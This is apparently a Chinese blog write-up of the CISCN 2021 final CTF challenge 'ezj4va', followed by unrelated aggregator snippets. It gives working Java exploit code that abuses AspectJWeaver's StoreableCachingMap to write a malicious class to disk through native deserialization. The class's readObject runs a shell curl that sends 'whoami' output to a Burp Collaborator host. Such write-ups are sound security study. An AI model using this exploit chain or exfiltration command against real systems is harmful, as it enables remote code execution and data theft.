当前位置：首页 > news >正文

【Web】记录CISCN 2021 总决赛 ezj4va题目复现——AspectJWeaver

news 2026/4/11 12:24:58

前言

原理分析

step 0

step 1

EXP

前文：【Web】浅聊Java反序列化之AspectJWeaver——任意文件写入-CSDN博客

前言

这就是当年传说中的零解题嘛😭，快做🤮了

有了之前的经验，思路顺挺快的，中间不知道为啥一直一直一直一直报错，耗了一个下午总算打通

考的是AspectJWeaver写恶意字节码到靶机上(本题jsp靶机不解析)，再去对其进行反序列化

值得一提的是，本题并未在输入流进行黑名单过滤，事实上就是纯粹的原生反序列化，但因该jdk下无利用链可打，所以只能先迂回写入一个恶意类，再对这个恶意类进行反序列化操作，实在是巧思！

原理分析

step 0

先看pom依赖

当时是2021年，Y4👴还没有公开fj原生反序列化的姿势，所以可以排除(

自然关注的重点会落在AspectJWeaver上，其可以实现任意文件写入(具体细节请看最开始给的文章，不作赘述)

问题是文章里给的姿势是利用CC依赖下LazyMap#get触发StoreableCachingMap#put从而写文件的，题目没有给CC依赖怎么破呢？

自然是要去利用题目自定义的类的哇，这里暂按下不表

此外，拿到源码后我们知晓了靶机的目录结构，方便我们后续利用

step 1

再来看路由

/cart/add

接受skus和cart两个参数，然后作为入参调用cartService.addToCart

addToCart方法就是对传入数据分别进行原生反序列化，将cart的SkuDescribe属性作为Map，将toAdd的SkuDescibe属性作为entry，并分别取其K V对put进Map中

如果令Map为精心构造folder属性的StoreableCachingMap，K V分别为恶意文件名和恶意字节码文件内容的话，我们就可以在靶机写入任意恶意字节码文件，属实太妙了(具体请看EXP构造)

再看/cart/query路由

对由cookie传入的cart值进行cartService#query操作

这里其实就是直接进行反序列化操作了，但题目的jdk下并没有原生反序列化的链子，所以我们无法直接进行利用，只能多走一步，去反序列化我们写入的恶意类

思路并不复杂，话休絮烦，直接给EXP

EXP

EXP.java

package ciscn.fina1.ezj4va;import ciscn.fina1.ezj4va.domain.Cart;
import ciscn.fina1.ezj4va.utils.Serializer;
import javassist.ClassPool;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;public class Exp {protected static String getSkus() {try {Cart cart = new Cart();Field sku_f = cart.getClass().getDeclaredField("skuDescribe");sku_f.setAccessible(true);HashMap hashMap = new HashMap<>();String bytes = Base64.getEncoder().encodeToString(ClassPool.getDefault().get(Evil.class.getName()).toBytecode());hashMap.put("Evil.class", Base64.getDecoder().decode(bytes));sku_f.set(cart, hashMap);return Serializer.serialize(cart);} catch (Exception e) {e.printStackTrace();}return "";}protected static String getOldCart() {try {Cart cart = new Cart();Field sku_f = cart.getClass().getDeclaredField("skuDescribe");sku_f.setAccessible(true);Class clazz = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap");Constructor constructor = clazz.getDeclaredConstructors()[0];constructor.setAccessible(true);Object o = constructor.newInstance("/ctf/ezj4va/app/target/classes/ciscn/fina1/ezj4va", 1);sku_f.set(cart, o);return Serializer.serialize(cart);} catch (Exception e) {e.printStackTrace();}return "";}public static void main(String[] args) throws Exception {String oldCartStr = getOldCart();String skus = getSkus();Evil evil = new Evil();System.out.println(oldCartStr);System.out.println(skus);System.out.println(Serializer.serialize(evil));}
}

Evil.java

package ciscn.fina1.ezj4va;import java.io.Serializable;public class Evil implements Serializable {private void readObject(java.io.ObjectInputStream s) throws Exception{Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","curl http://lpe59sb790s5tlrgmet6za2aj1psdh.burpcollaborator.net?a=`whoami`"});}
}

先访问/cart/add写入恶意字节码文件

再访问/cart/query来反序列化利用写入的恶意类

用bp起一个dnslog来外带数据

【Web】记录CISCN 2021 总决赛 ezj4va题目复现——AspectJWeaver

目录前言原理分析 step 0 step 1 EXP 前文：【Web】浅聊Java反序列化之AspectJWeaver——任意文件写入-CSDN博客前言这就是当年传说中的零解题嘛😭，快做🤮了有了之前的经验，思路顺挺快的，中间不…...

编程日记 2024/3/23 3:32:17

视频技术1：使用ABLMediaServer推流rtsp

ABLMediaServer定位是高性能、高稳定、开箱即用、商用级别的流媒体服务器下边展示了如何把1个mp3作为输入源，转换为rtsp流的过程。作用：用rtsp模拟摄像头的视频流 1、启动ABLMediaServer ABLMediaServer-2024-03-13\WinX64\ABLMediaServer.exe 配…...

编程日记 2024/3/23 3:31:14

HTML5+CSS3+JS小实例：创意罗盘时钟

实例：创意罗盘时钟技术栈：HTML+CSS+JS 效果：源码：【HTML】 <!DOCTYPE html> <html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=…...

编程日记 2024/3/23 3:29:12

设计数据库之内部模式：SQL基本操作

Chapter4：设计数据库之内部模式：SQL基本操作笔记来源： 1.《漫画数据库》—科学出版社 2.SQL | DDL, DQL, DML, DCL and TCL Commands 设计数据库的步骤： 概念模式概念模式(conceptual schema)是指将现实世界模型化的阶段进而&…...

编程日记 2024/3/23 3:28:11

Git浅谈配置文件和免密登录

一、文章内容简述git三种配置ssh免密登录以及遇见的问题git可忽略文件git remote 相关操作二、Git三种配置项目配置文件(局部)：项目路径/.git/config 文件 git config --local user.name name git config --local user.email 123qq.cc全局配置文(所有用户): …...

编程日记 2024/3/23 3:27:10

【好玩的经典游戏】Docker环境下部署RPG网页小游戏

【好玩的经典游戏】Docker环境下部署RPG网页小游戏一、react-tetris小游戏介绍1.1 react-tetris小游戏简介1.2 项目预览二、本次实践介绍2.1 本地环境规划2.2 本次实践介绍三、本地环境检查3.1 安装Docker环境3.2 检查Docker服务状态3.3 检查Docker版本3.4 检查docker compose…...

编程日记 2024/3/23 3:24:07

前端逻辑错误或UI崩溃解决问题

全屏错误覆盖层或UI崩溃 VueReact（错误边界） Vue Vue的全屏错误覆盖层解决，其实只需要配置Error就好，在开发服务器的client.overlay中设置关闭全屏覆盖层 module.exports {devServer: {client: {overlay: {warnings: false,error…...

编程日记 2024/3/23 3:23:06

python爬取QQ音乐评论信息

python爬取QQ音乐评论信息 python爬取QQ音乐评论信息1.随便选个音乐python爬取QQ音乐评论信息 1.随便选个音乐 https://y.qq.com/n/yqq/song/0039MnYb0qxYhV.html 当前的后台调试页面显示如下：找到评论的数据接口： https://c.y.qq.com/base/fcgi-bin/fcg_global_comme…...

编程日记 2024/3/23 3:22:05

Unity构建详解（1）——SBP介绍

【前言】 Unity的资源工作流程分为导入、创建、构建、分发、加载。我们说的是其中的构建步骤。构建是指将项目工程中的资源文件和代码整合程可执行文件的过程，构建的结果是生成可执行文件，在win平台上是exe，在Android平台上是apk&#xff…...

编程日记 2024/3/23 3:21:03

贪心算法（算法竞赛、蓝桥杯）--奶牛晒衣服

1、B站视频链接：A28 贪心算法 P1843 奶牛晒衣服_哔哩哔哩_bilibili 题目链接：奶牛晒衣服 - 洛谷 #include <bits/stdc.h> using namespace std; priority_queue<int> q;//用大根堆维护湿度的最大值 int n,a,b; int tim,maxn;int main(){s…...

编程日记 2024/3/23 3:18:00

Redis列表：高效消息通信与实时数据处理的利器

Redis是一个强大的开源内存数据库，被广泛应用于缓存、会话存储、队列等各种场景中。在Redis中，列表（List）是一种非常重要的数据结构，它提供了存储、获取、操作有序元素集合的功能。本文将深入探讨Redis列表的特性、使用…...

编程日记 2024/3/23 3:15:59

Redis中的缓存雪崩

缓存雪崩 🤔现象分析缓存雪崩是指在同一时段大量的缓存key同时失效或者缓存服务(Redis等)宕机，导致大量请求到达数据库，带来巨大压力。 👊 解决方案利用Redis集群提高服务的可用性，避免缓存服务宕机给缓存业务添…...

编程日记 2024/3/23 3:12:56

使用远程工具连接Mysql

（若想要远程连接Mysql需要下面解决四个问题） 1、目标地址直接查询 2、端口号 3306 3、防火墙关闭 [rootlocalhost date]# systemctl stop firewalld.service 4、授权mysql数据库root用户权限（因为mysql开始不允许其他IP访问&#xff0…...

编程日记 2024/3/23 3:11:54

2024不起眼的“致富”野路子，不想打工了，做做这些暴利创业项目。2024个人创业做什么项目好；最适合白手起家的创业项目

经济大环境差，并不代表就没有机会。相反，主流经济不好正是另一些人所看重的千载难逢的机会。就像股票市场一样，有人靠做多赚钱，有人靠做空赚钱。下面我们就来分析一下哪些行业会在这个时候崛起。首先二手行业会迅速崛起&#xff…...

编程日记 2024/3/23 3:08:50

导出文件的公共方法 export const download (res, tools) > {const { message, hide } tools;const fileReader: any new FileReader();console.log(fileReader-res>>>, res);fileReader.onload (e) > {if (res?.data?.type application/json) {try {co…...

编程日记 2024/3/23 3:04:46

哲♂学家带你深♂入了♂解结构体及结构体内存大小问题

目录概要一、结构体的声明二、结构体变量的创建和初始化三、结构体的特殊声明四、结构体内存对齐 1、对齐原则 2、例一对齐数计算方法 3、例二总结概要结构体是我们日常编程中经常要用到的一种自定义类型，使用起来也是十分的方便。接下来就由…...

编程日记 2024/3/23 3:03:45

基于SSM的土家风景文化管理平台（有报告）。Javaee项目。ssm项目。

演示视频： 基于SSM的土家风景文化管理平台（有报告）。Javaee项目。ssm项目。项目介绍： 采用M（model）V（view）C（controller）三层体系结构，通过Spri…...

编程日记 2024/3/23 3:01:43

2024年03月CCF-GESP编程能力等级认证C++编程一级真题解析

本文收录于专栏《C++等级认证CCF-GESP真题解析》，专栏总目录：点这里。订阅后可阅读专栏内所有文章。一、单选题（每题 2 分，共 30 分）第 1 题 C++表达式 (3 - 2) * 3 + 5 的值是( )。 A. -13 B. 8 C. 2 D. 0 答案：B 第 2 题 C++语句 cout << “5%2=” <&l…...

编程日记 2024/3/23 3:00:42

[Linux]条件变量：实现线程同步（什么是条件变量、为什么需要条件变量，怎么使用条件变量（接口）、例子，代码演示（生产者消费者模式））

目录一、条件变量 1.什么是条件变量故事说明 2、为什么需要使用条件变量竞态条件 3.什么是同步饥饿问题二、条件变量的接口 1.pthread_cond_t 2.初始化（pthread_cond_init） 3.销毁（pthread_cond_destroy） 4.等待&…...

编程日记 2024/3/23 2:58:40

从Java到json：探索 Jackson 的魔力

引言 Jackson简介 Jackson是一个用于处理JSON数据的开源Java库。JSON（JavaScript Object Notation）是一种轻量级的数据交换格式，易于阅读和编写，同时也易于计算机解析和生成。在Java领域，Jackson已经成为处理JSON数据的事实标准库。它提供了丰富的功能，包括将Java对象转…...

编程日记 2024/3/23 2:57:39

DotNetPy：现代.NET 与 Python 互操作实战指南道

我为什么会发出这个疑问呢？是因为我研究Web开发中的一个问题时，HTTP请求体在 Filter（过滤器）处被读取了之后，在 Controller（控制层）就读不到值了，使用 RequestBody 的时候。无论是字…...

编程新知 2026/4/11 12:24:04

文墨共鸣效果展示：当传统水墨美学遇上现代AI技术

文墨共鸣效果展示：当传统水墨美学遇上现代AI技术 1. 视觉与技术的完美融合 1.1 水墨美学的数字重生在数字化浪潮中，"文墨共鸣"项目创造性地将中国传统水墨美学与现代AI技术相结合。这个独特的语义相似度分析工具摒弃了传统技术工具的冰冷界…...

编程新知 2026/4/11 11:26:57

终极指南：为什么Tree of Thoughts思维树算法能提升AI推理能力70%？

终极指南：为什么Tree of Thoughts思维树算法能提升AI推理能力70%？ 【免费下载链接】tree-of-thoughts Plug in and Play Implementation of Tree of Thoughts: Deliberate Problem Solving with Large Language Models that Elevates Model Reasoning by…...

编程新知 2026/4/11 11:26:56